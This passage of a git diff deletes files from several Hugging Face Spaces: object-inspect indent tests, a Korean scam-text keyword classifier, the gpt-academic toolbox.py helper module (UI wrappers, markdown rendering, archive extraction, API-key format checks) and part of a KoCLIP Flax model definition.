lookup[base64.charCodeAt(i + 2)]; - encoded4 = lookup[base64.charCodeAt(i + 3)]; - bytes[p++] = (encoded1 << 2) | (encoded2 >> 4); - bytes[p++] = ((encoded2 & 15) << 4) | (encoded3 >> 2); - bytes[p++] = ((encoded3 & 3) << 6) | (encoded4 & 63); - } - return arraybuffer; -}; diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js deleted file mode 100644 index 89d8fcedfa318ca67c9ba8fe694ba06fd2b47044..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js +++ /dev/null @@ -1,271 +0,0 @@ -var test = require('tape'); -var forEach = require('for-each'); - -var inspect = require('../'); - -test('bad indent options', function (t) { - forEach([ - undefined, - true, - false, - -1, - 1.2, - Infinity, - -Infinity, - NaN - ], function (indent) { - t['throws']( - function () { inspect('', { indent: indent }); }, - TypeError, - inspect(indent) + ' is invalid' - ); - }); - - t.end(); -}); - -test('simple object with indent', function (t) { - t.plan(2); - - var obj = { a: 1, b: 2 }; - - var expectedSpaces = [ - '{', - ' a: 1,', - ' b: 2', - '}' - ].join('\n'); - var expectedTabs = [ - '{', - ' a: 1,', - ' b: 2', - '}' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { 
indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('two deep object with indent', function (t) { - t.plan(2); - - var obj = { a: 1, b: { c: 3, d: 4 } }; - - var expectedSpaces = [ - '{', - ' a: 1,', - ' b: {', - ' c: 3,', - ' d: 4', - ' }', - '}' - ].join('\n'); - var expectedTabs = [ - '{', - ' a: 1,', - ' b: {', - ' c: 3,', - ' d: 4', - ' }', - '}' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('simple array with all single line elements', function (t) { - t.plan(2); - - var obj = [1, 2, 3, 'asdf\nsdf']; - - var expected = '[ 1, 2, 3, \'asdf\\nsdf\' ]'; - - t.equal(inspect(obj, { indent: 2 }), expected, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expected, 'tabs'); -}); - -test('array with complex elements', function (t) { - t.plan(2); - - var obj = [1, { a: 1, b: { c: 1 } }, 'asdf\nsdf']; - - var expectedSpaces = [ - '[', - ' 1,', - ' {', - ' a: 1,', - ' b: {', - ' c: 1', - ' }', - ' },', - ' \'asdf\\nsdf\'', - ']' - ].join('\n'); - var expectedTabs = [ - '[', - ' 1,', - ' {', - ' a: 1,', - ' b: {', - ' c: 1', - ' }', - ' },', - ' \'asdf\\nsdf\'', - ']' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('values', function (t) { - t.plan(2); - var obj = [{}, [], { 'a-b': 5 }]; - - var expectedSpaces = [ - '[', - ' {},', - ' [],', - ' {', - ' \'a-b\': 5', - ' }', - ']' - ].join('\n'); - var expectedTabs = [ - '[', - ' {},', - ' [],', - ' {', - ' \'a-b\': 5', - ' }', - ']' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('Map', { skip: typeof Map !== 'function' }, function (t) { - var map = new Map(); - map.set({ a: 1 }, ['b']); - map.set(3, NaN); - - var expectedStringSpaces = [ - 'Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - '}' - ].join('\n'); - var expectedStringTabs = [ - 'Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - '}' - ].join('\n'); - var expectedStringTabsDoubleQuotes = [ - 'Map (2) {', - ' { a: 1 } => [ "b" ],', - ' 3 => NaN', - '}' - ].join('\n'); - - t.equal( - inspect(map, { indent: 2 }), - expectedStringSpaces, - 'Map keys are not indented (two)' - ); - t.equal( - inspect(map, { indent: '\t' }), - expectedStringTabs, - 'Map keys are not indented (tabs)' - ); - t.equal( - inspect(map, { indent: '\t', quoteStyle: 'double' }), - expectedStringTabsDoubleQuotes, - 'Map keys are not indented (tabs + double quotes)' - ); - - t.equal(inspect(new Map(), { indent: 2 }), 'Map (0) {}', 'empty Map should show as empty (two)'); - t.equal(inspect(new Map(), { indent: '\t' }), 'Map (0) {}', 'empty Map should show as empty (tabs)'); - - var nestedMap = new Map(); - nestedMap.set(nestedMap, map); - var expectedNestedSpaces = [ - 'Map (1) {', - ' [Circular] => Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - ' }', - '}' - ].join('\n'); - var expectedNestedTabs = [ - 'Map (1) {', - ' [Circular] => Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - ' }', - '}' - ].join('\n'); - t.equal(inspect(nestedMap, { indent: 2 }), expectedNestedSpaces, 'Map containing a Map should work (two)'); - t.equal(inspect(nestedMap, { indent: '\t' }), expectedNestedTabs, 'Map containing a Map should work (tabs)'); - - t.end(); -}); - -test('Set', { skip: typeof Set !== 'function' }, function (t) { - var set = new Set(); - set.add({ a: 1 }); - 
set.add(['b']); - var expectedStringSpaces = [ - 'Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - '}' - ].join('\n'); - var expectedStringTabs = [ - 'Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - '}' - ].join('\n'); - t.equal(inspect(set, { indent: 2 }), expectedStringSpaces, 'new Set([{ a: 1 }, ["b"]]) should show size and contents (two)'); - t.equal(inspect(set, { indent: '\t' }), expectedStringTabs, 'new Set([{ a: 1 }, ["b"]]) should show size and contents (tabs)'); - - t.equal(inspect(new Set(), { indent: 2 }), 'Set (0) {}', 'empty Set should show as empty (two)'); - t.equal(inspect(new Set(), { indent: '\t' }), 'Set (0) {}', 'empty Set should show as empty (tabs)'); - - var nestedSet = new Set(); - nestedSet.add(set); - nestedSet.add(nestedSet); - var expectedNestedSpaces = [ - 'Set (2) {', - ' Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - ' },', - ' [Circular]', - '}' - ].join('\n'); - var expectedNestedTabs = [ - 'Set (2) {', - ' Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - ' },', - ' [Circular]', - '}' - ].join('\n'); - t.equal(inspect(nestedSet, { indent: 2 }), expectedNestedSpaces, 'Set containing a Set should work (two)'); - t.equal(inspect(nestedSet, { indent: '\t' }), expectedNestedTabs, 'Set containing a Set should work (tabs)'); - - t.end(); -}); diff --git a/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py b/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py deleted file mode 100644 index 7be43be79a3c610bd6080df7b021cb8d86f0f486..0000000000000000000000000000000000000000 --- a/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py +++ /dev/null @@ -1,15 +0,0 @@ - -import re - -def is_spam(text: str) -> bool: - spam_keywords = ['상한가', '추친중', '무료체험', '수익보장', '정보입수', '출발', '마감', '무료거부', '코드', '체험반', '초대', '실력입증', '알려드린', '카카오톡제재'] - suspicious_url_pattern = r'(https?://[^\s]+)' - suspicious_url_pattern2 = r'(han.gl/[^\s]+)' - - found_keyword = any(word in text for word in spam_keywords) - found_suspicious_url = re.search(suspicious_url_pattern, text) or re.search(suspicious_url_pattern2, text) - - if found_keyword or found_suspicious_url: - return True - - return False diff --git a/spaces/fkhuggingme/gpt-academic/toolbox.py b/spaces/fkhuggingme/gpt-academic/toolbox.py deleted file mode 100644 index 5e42164d2bd26f6d8fcba54cb8d8238cdc7c9285..0000000000000000000000000000000000000000 --- a/spaces/fkhuggingme/gpt-academic/toolbox.py +++ /dev/null @@ -1,657 +0,0 @@ -import markdown -import importlib -import traceback -import inspect -import re -from latex2mathml.converter import convert as tex2mathml -from functools import wraps, lru_cache - -""" -======================================================================== -第一部分 -函数插件输入输出接驳区 - - ChatBotWithCookies: 带Cookies的Chatbot类,为实现更多强大的功能做基础 - - ArgsGeneralWrapper: 装饰器函数,用于重组输入参数,改变输入参数的顺序与结构 - - update_ui: 刷新界面用 yield from update_ui(chatbot, history) - - CatchException: 将插件中出的所有问题显示在界面上 - - HotReload: 实现插件的热更新 - - trimmed_format_exc: 打印traceback,为了安全而隐藏绝对地址 -======================================================================== -""" - -class ChatBotWithCookies(list): - def __init__(self, cookie): - self._cookies = cookie - - def write_list(self, list): - for t in list: - self.append(t) - - def get_list(self): - return [t for t in self] - - def get_cookies(self): - return self._cookies - - -def ArgsGeneralWrapper(f): - """ - 装饰器函数,用于重组输入参数,改变输入参数的顺序与结构。 - """ - def decorated(cookies, max_length, llm_model, txt, txt2, top_p, temperature, chatbot, history, 
system_prompt, plugin_advanced_arg, *args): - txt_passon = txt - if txt == "" and txt2 != "": txt_passon = txt2 - # 引入一个有cookie的chatbot - cookies.update({ - 'top_p':top_p, - 'temperature':temperature, - }) - llm_kwargs = { - 'api_key': cookies['api_key'], - 'llm_model': llm_model, - 'top_p':top_p, - 'max_length': max_length, - 'temperature':temperature, - } - plugin_kwargs = { - "advanced_arg": plugin_advanced_arg, - } - chatbot_with_cookie = ChatBotWithCookies(cookies) - chatbot_with_cookie.write_list(chatbot) - yield from f(txt_passon, llm_kwargs, plugin_kwargs, chatbot_with_cookie, history, system_prompt, *args) - return decorated - - -def update_ui(chatbot, history, msg='正常', **kwargs): # 刷新界面 - """ - 刷新用户界面 - """ - assert isinstance(chatbot, ChatBotWithCookies), "在传递chatbot的过程中不要将其丢弃。必要时,可用clear将其清空,然后用for+append循环重新赋值。" - yield chatbot.get_cookies(), chatbot, history, msg - -def trimmed_format_exc(): - import os, traceback - str = traceback.format_exc() - current_path = os.getcwd() - replace_path = "." - return str.replace(current_path, replace_path) - -def CatchException(f): - """ - 装饰器函数,捕捉函数f中的异常并封装到一个生成器中返回,并显示到聊天当中。 - """ - - @wraps(f) - def decorated(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - try: - yield from f(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT) - except Exception as e: - from check_proxy import check_proxy - from toolbox import get_conf - proxies, = get_conf('proxies') - tb_str = '```\n' + trimmed_format_exc() + '```' - if len(chatbot) == 0: - chatbot.clear() - chatbot.append(["插件调度异常", "异常原因"]) - chatbot[-1] = (chatbot[-1][0], - f"[Local Message] 实验性函数调用出错: \n\n{tb_str} \n\n当前代理可用性: \n\n{check_proxy(proxies)}") - yield from update_ui(chatbot=chatbot, history=history, msg=f'异常 {e}') # 刷新界面 - return decorated - - -def HotReload(f): - """ - HotReload的装饰器函数,用于实现Python函数插件的热更新。 - 函数热更新是指在不停止程序运行的情况下,更新函数代码,从而达到实时更新功能。 - 在装饰器内部,使用wraps(f)来保留函数的元信息,并定义了一个名为decorated的内部函数。 - 内部函数通过使用importlib模块的reload函数和inspect模块的getmodule函数来重新加载并获取函数模块, - 然后通过getattr函数获取函数名,并在新模块中重新加载函数。 - 最后,使用yield from语句返回重新加载过的函数,并在被装饰的函数上执行。 - 最终,装饰器函数返回内部函数。这个内部函数可以将函数的原始定义更新为最新版本,并执行函数的新版本。 - """ - @wraps(f) - def decorated(*args, **kwargs): - fn_name = f.__name__ - f_hot_reload = getattr(importlib.reload(inspect.getmodule(f)), fn_name) - yield from f_hot_reload(*args, **kwargs) - return decorated - - -""" -======================================================================== -第二部分 -其他小工具: - - write_results_to_file: 将结果写入markdown文件中 - - regular_txt_to_markdown: 将普通文本转换为Markdown格式的文本。 - - report_execption: 向chatbot中添加简单的意外错误信息 - - text_divide_paragraph: 将文本按照段落分隔符分割开,生成带有段落标签的HTML代码。 - - markdown_convertion: 用多种方式组合,将markdown转化为好看的html - - format_io: 接管gradio默认的markdown处理方式 - - on_file_uploaded: 处理文件的上传(自动解压) - - on_report_generated: 将生成的报告自动投射到文件上传区 - - clip_history: 当历史上下文过长时,自动截断 - - get_conf: 获取设置 - - select_api_key: 根据当前的模型类别,抽取可用的api-key -======================================================================== -""" - -def get_reduce_token_percent(text): - """ - * 此函数未来将被弃用 - """ - try: - # text = "maximum context length is 4097 tokens. 
However, your messages resulted in 4870 tokens" - pattern = r"(\d+)\s+tokens\b" - match = re.findall(pattern, text) - EXCEED_ALLO = 500 # 稍微留一点余地,否则在回复时会因余量太少出问题 - max_limit = float(match[0]) - EXCEED_ALLO - current_tokens = float(match[1]) - ratio = max_limit/current_tokens - assert ratio > 0 and ratio < 1 - return ratio, str(int(current_tokens-max_limit)) - except: - return 0.5, '不详' - - -def write_results_to_file(history, file_name=None): - """ - 将对话记录history以Markdown格式写入文件中。如果没有指定文件名,则使用当前时间生成文件名。 - """ - import os - import time - if file_name is None: - # file_name = time.strftime("chatGPT分析报告%Y-%m-%d-%H-%M-%S", time.localtime()) + '.md' - file_name = 'chatGPT分析报告' + \ - time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime()) + '.md' - os.makedirs('./gpt_log/', exist_ok=True) - with open(f'./gpt_log/{file_name}', 'w', encoding='utf8') as f: - f.write('# chatGPT 分析报告\n') - for i, content in enumerate(history): - try: # 这个bug没找到触发条件,暂时先这样顶一下 - if type(content) != str: - content = str(content) - except: - continue - if i % 2 == 0: - f.write('## ') - f.write(content) - f.write('\n\n') - res = '以上材料已经被写入' + os.path.abspath(f'./gpt_log/{file_name}') - print(res) - return res - - -def regular_txt_to_markdown(text): - """ - 将普通文本转换为Markdown格式的文本。 - """ - text = text.replace('\n', '\n\n') - text = text.replace('\n\n\n', '\n\n') - text = text.replace('\n\n\n', '\n\n') - return text - - - - -def report_execption(chatbot, history, a, b): - """ - 向chatbot中添加错误信息 - """ - chatbot.append((a, b)) - history.append(a) - history.append(b) - - -def text_divide_paragraph(text): - """ - 将文本按照段落分隔符分割开,生成带有段落标签的HTML代码。 - """ - if '```' in text: - # careful input - return text - else: - # wtf input - lines = text.split("\n") - for i, line in enumerate(lines): - lines[i] = lines[i].replace(" ", " ") - text = "
      ".join(lines) - return text - -@lru_cache(maxsize=128) # 使用 lru缓存 加快转换速度 -def markdown_convertion(txt): - """ - 将Markdown格式的文本转换为HTML格式。如果包含数学公式,则先将公式转换为HTML格式。 - """ - pre = '
      ' - suf = '
      ' - if txt.startswith(pre) and txt.endswith(suf): - # print('警告,输入了已经经过转化的字符串,二次转化可能出问题') - return txt # 已经被转化过,不需要再次转化 - - markdown_extension_configs = { - 'mdx_math': { - 'enable_dollar_delimiter': True, - 'use_gitlab_delimiters': False, - }, - } - find_equation_pattern = r'\n', '') - return content - - def no_code(txt): - if '```' not in txt: - return True - else: - if '```reference' in txt: return True # newbing - else: return False - - if ('$' in txt) and no_code(txt): # 有$标识的公式符号,且没有代码段```的标识 - # convert everything to html format - split = markdown.markdown(text='---') - convert_stage_1 = markdown.markdown(text=txt, extensions=['mdx_math', 'fenced_code', 'tables', 'sane_lists'], extension_configs=markdown_extension_configs) - convert_stage_1 = markdown_bug_hunt(convert_stage_1) - # re.DOTALL: Make the '.' special character match any character at all, including a newline; without this flag, '.' will match anything except a newline. Corresponds to the inline flag (?s). - # 1. convert to easy-to-copy tex (do not render math) - convert_stage_2_1, n = re.subn(find_equation_pattern, replace_math_no_render, convert_stage_1, flags=re.DOTALL) - # 2. convert to rendered equation - convert_stage_2_2, n = re.subn(find_equation_pattern, replace_math_render, convert_stage_1, flags=re.DOTALL) - # cat them together - return pre + convert_stage_2_1 + f'{split}' + convert_stage_2_2 + suf - else: - return pre + markdown.markdown(txt, extensions=['fenced_code', 'codehilite', 'tables', 'sane_lists']) + suf - - -def close_up_code_segment_during_stream(gpt_reply): - """ - 在gpt输出代码的中途(输出了前面的```,但还没输出完后面的```),补上后面的``` - - Args: - gpt_reply (str): GPT模型返回的回复字符串。 - - Returns: - str: 返回一个新的字符串,将输出代码片段的“后面的```”补上。 - - """ - if '```' not in gpt_reply: - return gpt_reply - if gpt_reply.endswith('```'): - return gpt_reply - - # 排除了以上两个情况,我们 - segments = gpt_reply.split('```') - n_mark = len(segments) - 1 - if n_mark % 2 == 1: - # print('输出代码片段中!') - return gpt_reply+'\n```' - else: - return gpt_reply - - -def format_io(self, y): - """ - 将输入和输出解析为HTML格式。将y中最后一项的输入部分段落化,并将输出部分的Markdown和数学公式转换为HTML格式。 - """ - if y is None or y == []: - return [] - i_ask, gpt_reply = y[-1] - i_ask = text_divide_paragraph(i_ask) # 输入部分太自由,预处理一波 - gpt_reply = close_up_code_segment_during_stream(gpt_reply) # 当代码输出半截的时候,试着补上后个``` - y[-1] = ( - None if i_ask is None else markdown.markdown(i_ask, extensions=['fenced_code', 'tables']), - None if gpt_reply is None else markdown_convertion(gpt_reply) - ) - return y - - -def find_free_port(): - """ - 返回当前系统中可用的未使用端口。 - """ - import socket - from contextlib import closing - with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: - s.bind(('', 0)) - s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - return s.getsockname()[1] - - -def extract_archive(file_path, dest_dir): - import zipfile - import tarfile - import os - # Get the file extension of the input file - file_extension = os.path.splitext(file_path)[1] - - # Extract the archive based on its extension - if file_extension == '.zip': - with zipfile.ZipFile(file_path, 'r') as zipobj: - zipobj.extractall(path=dest_dir) - print("Successfully extracted zip archive to {}".format(dest_dir)) - - elif file_extension in ['.tar', '.gz', '.bz2']: - with tarfile.open(file_path, 'r:*') as tarobj: - tarobj.extractall(path=dest_dir) - print("Successfully extracted tar archive to {}".format(dest_dir)) - - # 第三方库,需要预先pip install rarfile - # 此外,Windows上还需要安装winrar软件,配置其Path环境变量,如"C:\Program Files\WinRAR"才可以 - elif file_extension == 
'.rar': - try: - import rarfile - with rarfile.RarFile(file_path) as rf: - rf.extractall(path=dest_dir) - print("Successfully extracted rar archive to {}".format(dest_dir)) - except: - print("Rar format requires additional dependencies to install") - return '\n\n需要安装pip install rarfile来解压rar文件' - - # 第三方库,需要预先pip install py7zr - elif file_extension == '.7z': - try: - import py7zr - with py7zr.SevenZipFile(file_path, mode='r') as f: - f.extractall(path=dest_dir) - print("Successfully extracted 7z archive to {}".format(dest_dir)) - except: - print("7z format requires additional dependencies to install") - return '\n\n需要安装pip install py7zr来解压7z文件' - else: - return '' - return '' - - -def find_recent_files(directory): - """ - me: find files that is created with in one minutes under a directory with python, write a function - gpt: here it is! - """ - import os - import time - current_time = time.time() - one_minute_ago = current_time - 60 - recent_files = [] - - for filename in os.listdir(directory): - file_path = os.path.join(directory, filename) - if file_path.endswith('.log'): - continue - created_time = os.path.getmtime(file_path) - if created_time >= one_minute_ago: - if os.path.isdir(file_path): - continue - recent_files.append(file_path) - - return recent_files - - -def on_file_uploaded(files, chatbot, txt, txt2, checkboxes): - """ - 当文件被上传时的回调函数 - """ - if len(files) == 0: - return chatbot, txt - import shutil - import os - import time - import glob - from toolbox import extract_archive - try: - shutil.rmtree('./private_upload/') - except: - pass - time_tag = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime()) - os.makedirs(f'private_upload/{time_tag}', exist_ok=True) - err_msg = '' - for file in files: - file_origin_name = os.path.basename(file.orig_name) - shutil.copy(file.name, f'private_upload/{time_tag}/{file_origin_name}') - err_msg += extract_archive(f'private_upload/{time_tag}/{file_origin_name}', - dest_dir=f'private_upload/{time_tag}/{file_origin_name}.extract') - moved_files = [fp for fp in glob.glob('private_upload/**/*', recursive=True)] - if "底部输入区" in checkboxes: - txt = "" - txt2 = f'private_upload/{time_tag}' - else: - txt = f'private_upload/{time_tag}' - txt2 = "" - moved_files_str = '\t\n\n'.join(moved_files) - chatbot.append(['我上传了文件,请查收', - f'[Local Message] 收到以下文件: \n\n{moved_files_str}' + - f'\n\n调用路径参数已自动修正到: \n\n{txt}' + - f'\n\n现在您点击任意“红颜色”标识的函数插件时,以上文件将被作为输入参数'+err_msg]) - return chatbot, txt, txt2 - - -def on_report_generated(files, chatbot): - from toolbox import find_recent_files - report_files = find_recent_files('gpt_log') - if len(report_files) == 0: - return None, chatbot - # files.extend(report_files) - chatbot.append(['汇总报告如何远程获取?', '汇总报告已经添加到右侧“文件上传区”(可能处于折叠状态),请查收。']) - return report_files, chatbot - -def is_openai_api_key(key): - API_MATCH_ORIGINAL = re.match(r"sk-[a-zA-Z0-9]{48}$", key) - API_MATCH_AZURE = re.match(r"[a-zA-Z0-9]{32}$", key) - return bool(API_MATCH_ORIGINAL) or bool(API_MATCH_AZURE) - -def is_api2d_key(key): - if key.startswith('fk') and len(key) == 41: - return True - else: - return False - -def is_any_api_key(key): - if ',' in key: - keys = key.split(',') - for k in keys: - if is_any_api_key(k): return True - return False - else: - return is_openai_api_key(key) or is_api2d_key(key) - -def what_keys(keys): - avail_key_list = {'OpenAI Key':0, "API2D Key":0} - key_list = keys.split(',') - - for k in key_list: - if is_openai_api_key(k): - avail_key_list['OpenAI Key'] += 1 - - for k in key_list: - if is_api2d_key(k): - 
avail_key_list['API2D Key'] += 1 - - return f"检测到: OpenAI Key {avail_key_list['OpenAI Key']} 个,API2D Key {avail_key_list['API2D Key']} 个" - -def select_api_key(keys, llm_model): - import random - avail_key_list = [] - key_list = keys.split(',') - - if llm_model.startswith('gpt-'): - for k in key_list: - if is_openai_api_key(k): avail_key_list.append(k) - - if llm_model.startswith('api2d-'): - for k in key_list: - if is_api2d_key(k): avail_key_list.append(k) - - if len(avail_key_list) == 0: - raise RuntimeError(f"您提供的api-key不满足要求,不包含任何可用于{llm_model}的api-key。您可能选择了错误的模型或请求源。") - - api_key = random.choice(avail_key_list) # 随机负载均衡 - return api_key - -@lru_cache(maxsize=128) -def read_single_conf_with_lru_cache(arg): - from colorful import print亮红, print亮绿, print亮蓝 - try: - r = getattr(importlib.import_module('config_private'), arg) - except: - r = getattr(importlib.import_module('config'), arg) - # 在读取API_KEY时,检查一下是不是忘了改config - if arg == 'API_KEY': - print亮蓝(f"[API_KEY] 本项目现已支持OpenAI和API2D的api-key。也支持同时填写多个api-key,如API_KEY=\"openai-key1,openai-key2,api2d-key3\"") - print亮蓝(f"[API_KEY] 您既可以在config.py中修改api-key(s),也可以在问题输入区输入临时的api-key(s),然后回车键提交后即可生效。") - if is_any_api_key(r): - print亮绿(f"[API_KEY] 您的 API_KEY 是: {r[:15]}*** API_KEY 导入成功") - else: - print亮红( "[API_KEY] 正确的 API_KEY 是'sk'开头的51位密钥(OpenAI),或者 'fk'开头的41位密钥,请在config文件中修改API密钥之后再运行。") - if arg == 'proxies': - if r is None: - print亮红('[PROXY] 网络代理状态:未配置。无代理状态下很可能无法访问OpenAI家族的模型。建议:检查USE_PROXY选项是否修改。') - else: - print亮绿('[PROXY] 网络代理状态:已配置。配置信息如下:', r) - assert isinstance(r, dict), 'proxies格式错误,请注意proxies选项的格式,不要遗漏括号。' - return r - - -def get_conf(*args): - # 建议您复制一个config_private.py放自己的秘密, 如API和代理网址, 避免不小心传github被别人看到 - res = [] - for arg in args: - r = read_single_conf_with_lru_cache(arg) - res.append(r) - return res - - -def clear_line_break(txt): - txt = txt.replace('\n', ' ') - txt = txt.replace(' ', ' ') - txt = txt.replace(' ', ' ') - return txt - - -class DummyWith(): - """ - 这段代码定义了一个名为DummyWith的空上下文管理器, - 它的作用是……额……就是不起作用,即在代码结构不变得情况下取代其他的上下文管理器。 - 上下文管理器是一种Python对象,用于与with语句一起使用, - 以确保一些资源在代码块执行期间得到正确的初始化和清理。 - 上下文管理器必须实现两个方法,分别为 __enter__()和 __exit__()。 - 在上下文执行开始的情况下,__enter__()方法会在代码块被执行前被调用, - 而在上下文执行结束时,__exit__()方法则会被调用。 - """ - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, traceback): - return - -def run_gradio_in_subpath(demo, auth, port, custom_path): - """ - 把gradio的运行地址更改到指定的二次路径上 - """ - def is_path_legal(path: str)->bool: - ''' - check path for sub url - path: path to check - return value: do sub url wrap - ''' - if path == "/": return True - if len(path) == 0: - print("ilegal custom path: {}\npath must not be empty\ndeploy on root url".format(path)) - return False - if path[0] == '/': - if path[1] != '/': - print("deploy on sub-path {}".format(path)) - return True - return False - print("ilegal custom path: {}\npath should begin with \'/\'\ndeploy on root url".format(path)) - return False - - if not is_path_legal(custom_path): raise RuntimeError('Ilegal custom path') - import uvicorn - import gradio as gr - from fastapi import FastAPI - app = FastAPI() - if custom_path != "/": - @app.get("/") - def read_main(): - return {"message": f"Gradio is running at: {custom_path}"} - app = gr.mount_gradio_app(app, demo, path=custom_path) - uvicorn.run(app, host="0.0.0.0", port=port) # , auth=auth - - -def clip_history(inputs, history, tokenizer, max_token_limit): - """ - reduce the length of history by clipping. 
-    this function searches for the longest entries and clips them, little by little,
-    until the token count of the history falls below the threshold.
-    """
-    import numpy as np
-    from request_llm.bridge_all import model_info
-    def get_token_num(txt): 
-        return len(tokenizer.encode(txt, disallowed_special=()))
-    input_token_num = get_token_num(inputs)
-    if input_token_num < max_token_limit * 3 / 4:
-        # if the input takes up less than 3/4 of the token limit, clip the history:
-        # 1. reserve room for the input
-        max_token_limit = max_token_limit - input_token_num
-        # 2. reserve room for the output
-        max_token_limit = max_token_limit - 128
-        # 3. if the remaining budget is too small, just clear the history
-        if max_token_limit < 128:
-            history = []
-            return history
-    else:
-        # if the input takes up more than 3/4 of the token limit, clear the history entirely
-        history = []
-        return history
-
-    everything = ['']
-    everything.extend(history)
-    n_token = get_token_num('\n'.join(everything))
-    everything_token = [get_token_num(e) for e in everything]
-
-    # granularity of each truncation step
-    delta = max(everything_token) // 16
-
-    while n_token > max_token_limit:
-        where = np.argmax(everything_token)
-        encoded = tokenizer.encode(everything[where], disallowed_special=())
-        clipped_encoded = encoded[:len(encoded)-delta]
-        everything[where] = tokenizer.decode(clipped_encoded)[:-1]    # drop the last char, which may be malformed after clipping
-        everything_token[where] = get_token_num(everything[where])
-        n_token = get_token_num('\n'.join(everything))
-
-    history = everything[1:]
-    return history
diff --git a/spaces/flax-community/koclip/koclip/model.py b/spaces/flax-community/koclip/koclip/model.py
deleted file mode 100644
index 5cef2f7d22ab358e90049b7012c09faf70af6e07..0000000000000000000000000000000000000000
--- a/spaces/flax-community/koclip/koclip/model.py
+++ /dev/null
@@ -1,471 +0,0 @@
-# coding=utf-8
-# Copyright 2021 The HuggingFace Team. All rights reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
- -from typing import Optional, Tuple - -import flax.linen as nn -import jax -import jax.numpy as jnp -from flax.core.frozen_dict import FrozenDict -from transformers import FLAX_MODEL_MAPPING, FlaxCLIPVisionModel -from transformers.modeling_flax_utils import FlaxPreTrainedModel -from transformers.models.clip.modeling_flax_clip import FlaxCLIPOutput -from transformers.utils import logging - -from .config import HybridCLIPConfig - -logger = logging.get_logger(__name__) - - -class FlaxHybridCLIPModule(nn.Module): - config: HybridCLIPConfig - dtype: jnp.dtype = jnp.float32 - - def setup(self): - text_config = self.config.text_config - vision_config = self.config.vision_config - - self.projection_dim = self.config.projection_dim - self.text_embed_dim = text_config.hidden_size - self.vision_embed_dim = vision_config.hidden_size - - text_module = FLAX_MODEL_MAPPING[self.config.text_config.__class__].module_class - vision_module = FLAX_MODEL_MAPPING.get( - self.config.vision_config.__class__, FlaxCLIPVisionModel - ).module_class - - self.text_model = text_module(text_config, dtype=self.dtype) - self.vision_model = vision_module(vision_config, dtype=self.dtype) - - self.visual_projection = nn.Dense( - self.projection_dim, - dtype=self.dtype, - kernel_init=jax.nn.initializers.normal(0.02, dtype=self.dtype), - use_bias=False, - ) - self.text_projection = nn.Dense( - self.projection_dim, - dtype=self.dtype, - kernel_init=jax.nn.initializers.normal(0.02, dtype=self.dtype), - use_bias=False, - ) - self.logit_scale = self.param("logit_scale", jax.nn.initializers.ones, []) - - def __call__( - self, - input_ids=None, - pixel_values=None, - attention_mask=None, - position_ids=None, - token_type_ids=None, - deterministic: bool = True, - output_attentions=None, - output_hidden_states=None, - return_dict=None, - ): - return_dict = ( - return_dict if return_dict is not None else self.config.return_dict - ) - - vision_outputs = self.vision_model( - pixel_values=pixel_values, - deterministic=deterministic, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - text_outputs = self.text_model( - input_ids=input_ids, - attention_mask=attention_mask, - token_type_ids=token_type_ids, - position_ids=position_ids, - deterministic=deterministic, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - image_embeds = vision_outputs[1] - image_embeds = self.visual_projection(image_embeds) - - text_embeds = text_outputs[1] - text_embeds = self.text_projection(text_embeds) - - # normalized features - image_embeds = image_embeds / jnp.linalg.norm( - image_embeds, axis=-1, keepdims=True - ) - text_embeds = text_embeds / jnp.linalg.norm(text_embeds, axis=-1, keepdims=True) - - # cosine similarity as logits - logit_scale = jnp.exp(self.logit_scale) - logits_per_text = jnp.matmul(text_embeds, image_embeds.T) * logit_scale - logits_per_image = logits_per_text.T - - if not return_dict: - return ( - logits_per_image, - logits_per_text, - text_embeds, - image_embeds, - text_outputs, - vision_outputs, - ) - - return FlaxCLIPOutput( - logits_per_image=logits_per_image, - logits_per_text=logits_per_text, - text_embeds=text_embeds, - image_embeds=image_embeds, - text_model_output=text_outputs, - 